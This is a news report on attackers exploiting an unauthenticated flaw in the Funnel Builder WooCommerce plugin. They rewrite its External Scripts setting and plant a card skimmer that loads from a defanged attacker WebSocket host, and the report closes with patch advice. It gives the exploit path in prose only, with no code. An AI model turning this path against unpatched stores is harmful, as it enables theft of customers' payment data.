The Funnel Builder WordPress plugin has been exploited by attackers to steal credit card information from unsuspecting users. The vulnerability affects all versions before 3.15.0.3 and highlights the importance of keeping plugins up-to-date and regularly reviewing settings for potential security threats.
The security landscape for e-commerce platforms continues to evolve at a rapid pace, with new vulnerabilities being discovered and exploited by malicious actors on an ongoing basis. The latest development in this regard is the exploitation of a critical vulnerability in the Funnel Builder WordPress plugin, which has been actively used to steal sensitive information from unsuspecting users.
The vulnerability, which has not received an official identifier at this time, can be leveraged without authentication and affects all versions of the Funnel Builder plugin before 3.15.0.3. This means that even website owners who have taken steps to keep their platforms secure may still be vulnerable to attack if they are using an outdated version of the plugin.
Funnel Builder is a WordPress plugin for WooCommerce Checkout, developed by FunnelKit, and primarily used to customize checkout pages. Features such as one-click upsells, landing pages, and conversion rate optimization make it a popular choice among e-commerce site owners. However, the recent discovery of this vulnerability highlights the importance of keeping all plugins up-to-date and regularly reviewing their settings for potential security threats.
According to statistics from WordPress.org, the Funnel Builder plugin is active on over 40,000 websites, making it a significant target for attackers. E-commerce security company Sansec detected the malicious activity, which involved injecting malicious JavaScript snippets into WooCommerce checkout pages.
The payload, which was disguised as a fake Google Tag Manager/Google Analytics script, opened a WebSocket connection to an external location (wss://protect-wss[.]com/ws). This allowed attackers to modify the plugin's global settings via an unprotected, publicly exposed checkout endpoint. As a result, malicious code could be injected into the plugin's "External Scripts" setting, causing arbitrary JavaScript to execute on every checkout page.
Sansec reports that the attacker-controlled server delivered a customized payment card skimmer, which stole sensitive information including credit card numbers, CVVs, billing addresses, and other customer data. Payment card skimmers are tools used by threat actors to make fraudulent online purchases, while stolen records often end up sold individually or in bulk on dark web portals known as carding markets.
FunnelKit addressed the vulnerability in version 3.15.0.3 of Funnel Builder, which was released yesterday. The vendor has issued a security advisory recommending that website owners and administrators prioritize updating to the latest version from the WordPress dashboard and review Settings > Checkout > External Scripts for potential rogue scripts.
It is essential for e-commerce site owners to take immediate action to protect themselves against this vulnerability. They should ensure that all plugins are up-to-date, including Funnel Builder, and regularly review their settings for any suspicious activity. By taking these steps, they can minimize the risk of being targeted by malicious actors and protect their customers' sensitive information.
The exploitation of this critical vulnerability highlights the importance of ongoing security monitoring and testing. Automated pentesting tools deliver real value but were built to answer a single question: can an attacker move through the network? They were not designed to test whether your controls block threats, detection rules fire, or cloud configs hold.
As we continue to navigate the complex landscape of e-commerce security, it is crucial that we prioritize the use of validated tools and techniques. By doing so, we can better protect our platforms and customers from the ever-evolving threat landscape.